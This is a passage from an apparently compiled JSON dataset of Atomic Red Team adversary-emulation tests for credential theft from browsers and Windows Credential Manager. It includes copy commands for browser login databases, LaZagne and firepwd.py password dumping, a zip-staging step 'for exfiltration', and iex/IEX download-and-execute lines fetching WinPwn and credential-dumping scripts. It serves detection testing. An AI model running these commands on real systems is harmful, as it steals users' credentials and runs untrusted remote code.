"#{lazagne_path} browsers\n" + } + }, + { + "name": "Simulating access to Chrome Login Data", + "auto_generated_guid": "3d111226-d09a-4911-8715-fe11664f960d", + "description": "Simulates an adversary accessing encrypted credentials from Google Chrome Login database. 
\n", + "supported_platforms": [ + "windows" + ], + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Chrome must be installed\n", + "prereq_command": "if ((Test-Path \"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe\") -Or (Test-Path \"C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe\")) {exit 0} else {exit 1}", + "get_prereq_command": "$installer = \"$env:temp\\ChromeStandaloneSetup64.msi\"\nInvoke-WebRequest -OutFile $env:temp\\ChromeStandaloneSetup64.msi https://dl.google.com/chrome/install/googlechromestandaloneenterprise64.msi\nmsiexec /i $installer /qn\nStart-Process -FilePath \"chrome.exe\"\nStop-Process -Name \"chrome\"\n" + } + ], + "executor": { + "name": "powershell", + "command": "Copy-Item \"$env:LOCALAPPDATA\\Google\\Chrome\\User Data\\Default\\Login Data\" -Destination $env:temp\nCopy-Item \"$env:LOCALAPPDATA\\Google\\Chrome\\User Data\\Default\\Login Data For Account\" -Destination $env:temp\n", + "cleanup_command": "Remove-Item -Path \"$env:temp\\Login Data\" -Force -ErrorAction Ignore\nRemove-Item -Path \"$env:temp\\Login Data For Account\" -Force -ErrorAction Ignore\n" + } + }, + { + "name": "Simulating access to Opera Login Data", + "auto_generated_guid": "28498c17-57e4-495a-b0be-cc1e36de408b", + "description": "Simulates an adversary accessing encrypted credentials from Opera web browser's login database. 
\n", + "supported_platforms": [ + "windows" + ], + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Opera must be installed\n", + "prereq_command": "if (((Test-Path \"$env:LOCALAPPDATA\\Programs\\Opera\\launcher.exe\") -Or (Test-Path \"C:\\Program Files\\Opera\\launcher.exe\") -Or (Test-Path \"C:\\Program Files (x86)\\Opera\\launcher.exe\"))) {exit 0} else {exit 1}", + "get_prereq_command": "$installer = \"$env:temp\\OperaStandaloneInstaller.exe\"\nInvoke-WebRequest -OutFile $env:temp\\OperaStandaloneInstaller.exe https://get.geo.opera.com/pub/opera/desktop/82.0.4227.43/win/Opera_82.0.4227.43_Setup.exe\nStart-Process $installer -ArgumentList '/install /silent /launchopera=1 /setdefaultbrowser=0'\nStart-Sleep -s 180\nStop-Process -Name \"opera\"\n" + }, + { + "description": "Opera login data file must exist\n", + "prereq_command": "if (Test-Path \"$env:APPDATA\\Opera Software\\Opera Stable\\Login Data\") {exit 0} else {exit 1}", + "get_prereq_command": "New-Item -Path \"$env:APPDATA\\Opera Software\\Opera Stable\\Login Data\" -ItemType File\n" + } + ], + "executor": { + "name": "powershell", + "command": "Copy-Item \"$env:APPDATA\\Opera Software\\Opera Stable\\Login Data\" -Destination $env:temp\n", + "cleanup_command": "Remove-Item -Path \"$env:temp\\Login Data\" -Force -ErrorAction Ignore\n" + } + }, + { + "name": "Simulating access to Windows Firefox Login Data", + "auto_generated_guid": "eb8da98a-2e16-4551-b3dd-83de49baa14c", + "description": "Simulates an adversary accessing encrypted credentials from firefox web browser's login database.\nmore info in https://support.mozilla.org/en-US/kb/profiles-where-firefox-stores-user-data\n", + "supported_platforms": [ + "windows" + ], + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Firefox must be installed\n", + "prereq_command": "if ((Test-Path \"C:\\Program Files\\Mozilla Firefox\\firefox.exe\") -Or (Test-Path \"C:\\Program Files (x86)\\Mozilla 
Firefox\\firefox.exe\")) {exit 0} else {exit 1}", + "get_prereq_command": "if ($env:PROCESSOR_ARCHITECTURE -eq 'AMD64') {$url=\"https://download.mozilla.org/?product=firefox-latest-ssl&os=win64&lang=en-US\"}else {$url=\"https://download.mozilla.org/?product=firefox-latest-ssl&os=win&lang=en-US\"}\n$installer = \"$env:temp\\firefoxsetup.exe\"\n(New-Object Net.WebClient).DownloadFile($url,$installer)\nStart-Process $installer -ArgumentList '/S' -Wait\n" + }, + { + "description": "Firefox login data file must exist\n", + "prereq_command": "if (Test-Path \"$env:APPDATA\\Mozilla\\Firefox\\Profiles\\\") {exit 0} else {exit 1}", + "get_prereq_command": "if ($env:PROCESSOR_ARCHITECTURE -eq 'AMD64') {$firefox=\"C:\\Program Files\\Mozilla Firefox\\firefox.exe\"}else {$firefox=\"C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe\"}\nStart-Process $firefox -ArgumentList '-CreateProfile Atomic' -Wait\nStart-Process $firefox -NoNewWindow\nStart-Sleep -s 20\nStop-Process -Name firefox\n" + } + ], + "executor": { + "name": "powershell", + "command": "Copy-Item \"$env:APPDATA\\Mozilla\\Firefox\\Profiles\\\" -Destination $env:temp -Force -Recurse\n", + "cleanup_command": "Remove-Item -Path \"$env:temp\\Profiles\" -Force -ErrorAction Ignore -Recurse\n" + } + }, + { + "name": "Simulating access to Windows Edge Login Data", + "auto_generated_guid": "a6a5ec26-a2d1-4109-9d35-58b867689329", + "description": "Simulates an adversary accessing encrypted credentials from Edge web browser's login database.\nmore info in https://www.forensicfocus.com/articles/chromium-based-microsoft-edge-from-a-forensic-point-of-view/\n", + "supported_platforms": [ + "windows" + ], + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Edge must be installed\n", + "prereq_command": "if (Test-Path \"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\") {exit 0} else {exit 1}", + "get_prereq_command": "\"Installation is not implemented as Edge is a part of 
windows\"\n" + }, + { + "description": "Edge login data file must exist\n", + "prereq_command": "if (Test-Path \"$env:LOCALAPPDATA\\Microsoft\\Edge\\User Data\\Default\") {exit 0} else {exit 1}", + "get_prereq_command": "$edge=\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\"\nStart-Process $edge \nStart-Sleep -s 20\nStop-Process -Name msedge\n" + } + ], + "executor": { + "name": "powershell", + "command": "Copy-Item \"$env:LOCALAPPDATA\\Microsoft\\Edge\\User Data\\Default\" -Destination $env:temp\\Edge -Force -Recurse\n", + "cleanup_command": "Remove-Item -Path \"$env:temp\\Edge\" -Force -ErrorAction Ignore -Recurse\n" + } + }, + { + "name": "Decrypt Mozilla Passwords with Firepwd.py", + "auto_generated_guid": "dc9cd677-c70f-4df5-bd1c-f114af3c2381", + "description": "Firepwd.py is a script that can decrypt Mozilla (Thunderbird, Firefox) passwords.\nUpon successful execution, the decrypted credentials will be output to a text file, as well as displayed on screen. \n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "Firepwd_Path": { + "description": "Filepath for Firepwd.py", + "type": "String", + "default": "$env:temp\\Firepwd.py" + }, + "Out_Filepath": { + "description": "Filepath to output results to", + "type": "String", + "default": "$env:temp\\T1555.003Test8.txt" + }, + "VS_CMD_Path": { + "description": "Filepath to Visual Studio Build Tools Command prompt", + "type": "String", + "default": "C:\\Program Files (x86)\\Microsoft Visual Studio\\2022\\BuildTools\\VC\\Auxiliary\\Build\\vcvars64.bat" + }, + "Python_Path": { + "description": "Filepath to python", + "type": "String", + "default": "C:\\Program Files\\Python310\\python.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Firepwd must exist at #{Firepwd_Path}\n", + "prereq_command": "if (Test-Path \"#{Firepwd_Path}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "Invoke-WebRequest 
\"https://raw.githubusercontent.com/lclevy/firepwd/167eabf3b88d5a7ba8b8bc427283f827b6885982/firepwd.py\" -outfile \"#{Firepwd_Path}\"\n" + }, + { + "description": "Firefox profile directory must be present\n", + "prereq_command": "if (get-childitem -path \"$env:appdata\\Mozilla\\Firefox\\Profiles\\*.default-release\\\" -erroraction silentlycontinue) {exit 0} else {exit 1}\n", + "get_prereq_command": "Invoke-WebRequest \"https://ftp.mozilla.org/pub/firefox/releases/98.0/win64/en-US/Firefox%20Setup%2098.0.msi\" -outfile \"$env:temp\\firefox.msi\"\nmsiexec.exe /i \"$env:temp\\firefox.msi\" /quiet\nsleep -s 30\nstart-process \"$env:programfiles\\Mozilla Firefox\\firefox.exe\".\nsleep -s 5\nstop-process -name \"firefox\"\n" + }, + { + "description": "Visual Studio Build Tools command prompt must exist at #{VS_CMD_Path}\n", + "prereq_command": "if (Test-Path \"#{VS_CMD_Path}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "invoke-webrequest \"https://aka.ms/vs/17/release/vs_BuildTools.exe\" -outfile \"$env:temp\\VS_BuildTools.exe\"\nwrite-host \"Visual Studio Build Tools (Desktop Development with C++) must be installed manually. 
Please run the installer from $env:temp\\VS_BuildTools.exe.\"\n" + }, + { + "description": "Python must be installed\n", + "prereq_command": "if (Test-Path \"#{Python_Path}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "invoke-webrequest \"https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe\" -outfile \"$env:temp\\python_setup.exe\"\nStart-Process -FilePath $env:TEMP\\python_setup.exe -ArgumentList \"/quiet InstallAllUsers=1 PrependPath=1 Include_test=0\" -Wait\n" + }, + { + "description": "Pip must be installed.\n", + "prereq_command": "$env:Path = [System.Environment]::ExpandEnvironmentVariables([System.Environment]::GetEnvironmentVariable(\"Path\",\"Machine\") + \";\" + [System.Environment]::GetEnvironmentVariable(\"Path\",\"User\"))\nif (pip -v) {exit 0} else {exit 1}\n", + "get_prereq_command": "invoke-webrequest \"https://bootstrap.pypa.io/ez_setup.py\" -outfile \"$env:temp\\ez_setup.py\" \ninvoke-webrequest \"https://bootstrap.pypa.io/get-pip.py\" -outfile \"$env:temp\\get-pip.py\"\ncmd /c \"$env:temp\\ez_setup.py\"\ncmd /c \"$env:temp\\get-pip.py\"\n" + }, + { + "description": "Pycryptodome library must be installed \n", + "prereq_command": "$env:Path = [System.Environment]::ExpandEnvironmentVariables([System.Environment]::GetEnvironmentVariable(\"Path\",\"Machine\") + \";\" + [System.Environment]::GetEnvironmentVariable(\"Path\",\"User\"))\nif (pip show pycryptodome) {exit 0} else {exit 1}\n", + "get_prereq_command": "$env:Path = [System.Environment]::ExpandEnvironmentVariables([System.Environment]::GetEnvironmentVariable(\"Path\",\"Machine\") + \";\" + [System.Environment]::GetEnvironmentVariable(\"Path\",\"User\"))\nif (test-path \"#{VS_CMD_Path}\"){pip install pycryptodome | out-null | cmd /c %comspec% /k \"#{VS_CMD_Path}\" | out-null} else {write-host \"Visual Studio Build Tools (C++ Support) must be installed to continue gathering this prereq\"}\n" + }, + { + "description": "Pyasn1 library must be installed \n", + 
"prereq_command": "$env:Path = [System.Environment]::ExpandEnvironmentVariables([System.Environment]::GetEnvironmentVariable(\"Path\",\"Machine\") + \";\" + [System.Environment]::GetEnvironmentVariable(\"Path\",\"User\"))\nif (pip show pyasn1) {exit 0} else {exit 1}\n", + "get_prereq_command": "$env:Path = [System.Environment]::ExpandEnvironmentVariables([System.Environment]::GetEnvironmentVariable(\"Path\",\"Machine\") + \";\" + [System.Environment]::GetEnvironmentVariable(\"Path\",\"User\"))\nif (test-path \"#{VS_CMD_Path}\"){pip install pyasn1 | out-null | cmd /c %comspec% /k \"#{VS_CMD_Path}\" | out-null} else {write-host \"Visual Studio Build Tools (C++ Support) must be installed to continue gathering this prereq.\"}\n" + } + ], + "executor": { + "name": "powershell", + "command": "$PasswordDBLocation = get-childitem -path \"$env:appdata\\Mozilla\\Firefox\\Profiles\\*.default-release\\\"\ncmd /c #{Firepwd_Path} -d $PasswordDBLocation > #{Out_Filepath}\ncat #{Out_Filepath}\n", + "cleanup_command": "Remove-Item -Path \"#{Out_Filepath}\" -erroraction silentlycontinue \n" + } + }, + { + "name": "LaZagne.py - Dump Credentials from Firefox Browser", + "auto_generated_guid": "87e88698-621b-4c45-8a89-4eaebdeaabb1", + "description": "Credential Dump Ubuntu 20.04.4 LTS Focal Fossa Firefox Browser, Reference https://github.com/AlessandroZ/LaZagne", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "lazagne_path": { + "description": "Path you put LaZagne Github with LaZagne.py", + "type": "String", + "default": "/tmp/LaZagne/Linux" + }, + "specific_module": { + "description": "You may change the module to \"all\" for all password that can be found by LaZagne.py", + "type": "string", + "default": "browsers -firefox" + }, + "output_file": { + "description": "This is where output for the Firefox passwords goes", + "type": "String", + "default": "/tmp/firefox_password.txt" + } + }, + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": 
"Get Lazagne from Github and install requirements", + "prereq_command": "test -f #{lazagne_path}/laZagne.py", + "get_prereq_command": "cd /tmp; git clone https://github.com/AlessandroZ/LaZagne; cd /tmp/LaZagne/; pip install -r requirements.txt" + }, + { + "description": "Needs git, python3 and some pip stuff", + "prereq_command": "which git && which python3 && which pip", + "get_prereq_command": "apt install git; apt install python3-pip -y; pip install pyasn1 psutil Crypto" + } + ], + "executor": { + "command": "python3 #{lazagne_path}/laZagne.py #{specific_module} >> #{output_file}", + "cleanup_command": "rm -R /tmp/LaZagne; rm -f #{output_file}", + "name": "sh", + "elevation_required": true + } + }, + { + "name": "Stage Popular Credential Files for Exfiltration", + "auto_generated_guid": "f543635c-1705-42c3-b180-efd6dc6e7ee7", + "description": "This test is designed to search a drive for credential files used by the most common web browsers on Windows (Firefox, Chrome, Opera, and Edge), export the found files to a folder, and zip it,\nsimulating how an adversary might stage sensitive credential files for exfiltration in order to conduct offline password extraction with tools like [firepwd.py](https://github.com/lclevy/firepwd) or [HackBrowserData](https://github.com/moonD4rk/HackBrowserData). 
\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "name": "powershell", + "command": "$exfil_folder = \"$env:temp\\T1555.003\"\nif (test-path \"$exfil_folder\") {} else {new-item -path \"$env:temp\" -Name \"T1555.003\" -ItemType \"directory\" -force}\n$FirefoxCredsLocation = get-childitem -path \"$env:appdata\\Mozilla\\Firefox\\Profiles\\*.default-release\\\"\nif (test-path \"$FirefoxCredsLocation\\key4.db\") {copy-item \"$FirefoxCredsLocation\\key4.db\" -destination \"$exfil_folder\\T1555.003Firefox_key4.db\"} else {}\nif (test-path \"$FirefoxCredsLocation\\logins.json\") {copy-item \"$FirefoxCredsLocation\\logins.json\" -destination \"$exfil_folder\\T1555.003Firefox_logins.json\"} else {}\nif (test-path \"$env:localappdata\\Google\\Chrome\\User Data\\Default\\Login Data\") {copy-item \"$env:localappdata\\Google\\Chrome\\User Data\\Default\\Login Data\" -destination \"$exfil_folder\\T1555.003Chrome_Login Data\"} else {}\nif (test-path \"$env:localappdata\\Google\\Chrome\\User Data\\Default\\Login Data For Account\") {copy-item \"$env:localappdata\\Google\\Chrome\\User Data\\Default\\Login Data For Account\" -destination \"$exfil_folder\\T1555.003Chrome_Login Data For Account\"} else {}\nif (test-path \"$env:appdata\\Opera Software\\Opera Stable\\Login Data\") {copy-item \"$env:appdata\\Opera Software\\Opera Stable\\Login Data\" -destination \"$exfil_folder\\T1555.003Opera_Login Data\"} else {}\nif (test-path \"$env:localappdata/Microsoft/Edge/User Data/Default/Login Data\") {copy-item \"$env:localappdata/Microsoft/Edge/User Data/Default/Login Data\" -destination \"$exfil_folder\\T1555.003Edge_Login Data\"} else {} \ncompress-archive -path \"$exfil_folder\" -destinationpath \"$exfil_folder.zip\" -force\n", + "cleanup_command": "Remove-Item -Path \"$env:temp\\T1555.003.zip\" -force -erroraction silentlycontinue \nRemove-Item -Path \"$env:temp\\T1555.003\\\" -force -recurse -erroraction silentlycontinue\n" + } + }, + { + "name": "WinPwn - 
BrowserPwn", + "auto_generated_guid": "764ea176-fb71-494c-90ea-72e9d85dce76", + "description": "Collect Browser credentials as well as the history via winpwn browserpwn function of WinPwn.", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nbrowserpwn -consoleoutput -noninteractive", + "cleanup_command": "rm .\\System.Data.SQLite.dll -ErrorAction Ignore", + "name": "powershell" + } + }, + { + "name": "WinPwn - Loot local Credentials - mimi-kittenz", + "auto_generated_guid": "ec1d0b37-f659-4186-869f-31a554891611", + "description": "Loot local Credentials - mimi-kittenz technique via function of WinPwn - Extend timeout to 600s", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nkittenz -consoleoutput -noninteractive", + "name": "powershell" + } + }, + { + "name": "WinPwn - PowerSharpPack - Sharpweb for Browser Credentials", + "auto_generated_guid": "e5e3d639-6ea8-4408-9ecd-d5a286268ca0", + "description": "PowerSharpPack - Sharpweb searching for Browser Credentials technique via function of WinPwn", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Sharpweb.ps1')\nInvoke-Sharpweb -command \"all\"", + "name": "powershell" + } + }, + { + "name": "Simulating Access to Chrome Login Data - MacOS", + "auto_generated_guid": "124e13e5-d8a1-4378-a6ee-a53cd0c7e369", + "description": "This test locates the Login Data 
files used by Chrome to store encrypted credentials, then copies them to the temp directory for later exfil. \nOnce the files are exfiltrated, malware like CookieMiner could be used to perform credential extraction. \nSee https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/ . \n", + "supported_platforms": [ + "macos" + ], + "executor": { + "command": "cp ~/Library/\"Application Support/Google/Chrome/Default/Login Data\" \"/tmp/T1555.003_Login Data\"\ncp ~/Library/\"Application Support/Google/Chrome/Default/Login Data For Account\" \"/tmp/T1555.003_Login Data For Account\"\n", + "cleanup_command": "rm \"/tmp/T1555.003_Login Data\" >/dev/null 2>&1\nrm \"/tmp/T1555.003_Login Data For Account\" >/dev/null 2>&1\n", + "name": "sh" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + 
"relationship": "executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process access", + "description": "A process was accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process access", + "description": "A process was accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "process" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ] + ] + }, + { + "technique_id": 
"T1555.004", + "command_list": [ + "vaultcmd /listcreds:\"Windows Credentials\"\n", + "iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Creds/master/obfuscatedps/DumpWCM.ps1')\nInvoke-WCMDump" + ], + "commands": [ + { + "command": "vaultcmd /listcreds:\"Windows Credentials\"\n", + "source": "atomics/T1555.004/T1555.004.yaml", + "name": "Atomic Red Team Test - Credentials from Password Stores: Windows Credential Manager" + }, + { + "command": "iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Creds/master/obfuscatedps/DumpWCM.ps1')\nInvoke-WCMDump", + "source": "atomics/T1555.004/T1555.004.yaml", + "name": "Atomic Red Team Test - Credentials from Password Stores: Windows Credential Manager" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1555.004", + "display_name": "Credentials from Password Stores: Windows Credential Manager", + "atomic_tests": [ + { + "name": "Access Saved Credentials via VaultCmd", + "auto_generated_guid": "9c2dd36d-5c8b-4b29-8d72-a11b0d5d7439", + "description": "List credentials currently stored in Windows Credential Manager via the native Windows utility vaultcmd.exe\nCredential Manager stores credentials for signing into websites, applications, and/or devices that request authentication through NTLM or Kerberos\nhttps://blog.malwarebytes.com/101/2016/01/the-windows-vaults/\nhttps://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "name": "command_prompt", + "elevation_required": false, + "command": "vaultcmd /listcreds:\"Windows Credentials\"\n" + } + }, + { + "name": "WinPwn - Loot local Credentials - Invoke-WCMDump", + "auto_generated_guid": "fa714db1-63dd-479e-a58e-7b2b52ca5997", + "description": "Loot local Credentials - Invoke-WCMDump technique via function of WinPwn", + "supported_platforms": [ + "windows" + ], + 
"executor": { + "command": "iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Creds/master/obfuscatedps/DumpWCM.ps1')\nInvoke-WCMDump", + "name": "powershell" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through 
a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "file" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1555", + "command_list": [ + "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" -UseBasicParsing)\nInvoke-Maldoc -macroFile \"PathToAtomicsFolder\\T1555\\src\\T1555-macrocode.txt\" -officeProduct \"Word\" -sub \"Extract\"\n", + "IEX (IWR 'https://raw.githubusercontent.com/skar4444/Windows-Credential-Manager/4ad208e70c80dd2a9961db40793da291b1981e01/GetCredmanCreds.ps1' -UseBasicParsing); Get-PasswordVaultCredentials -Force \n", + "IEX (IWR 'https://raw.githubusercontent.com/skar4444/Windows-Credential-Manager/4ad208e70c80dd2a9961db40793da291b1981e01/GetCredmanCreds.ps1' -UseBasicParsing); Get-CredManCreds -Force\n", + "vaultcmd /listcreds:\"Windows Credentials\" /all\n", + "vaultcmd /listcreds:\"Web Credentials\" /all\n", + "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object 
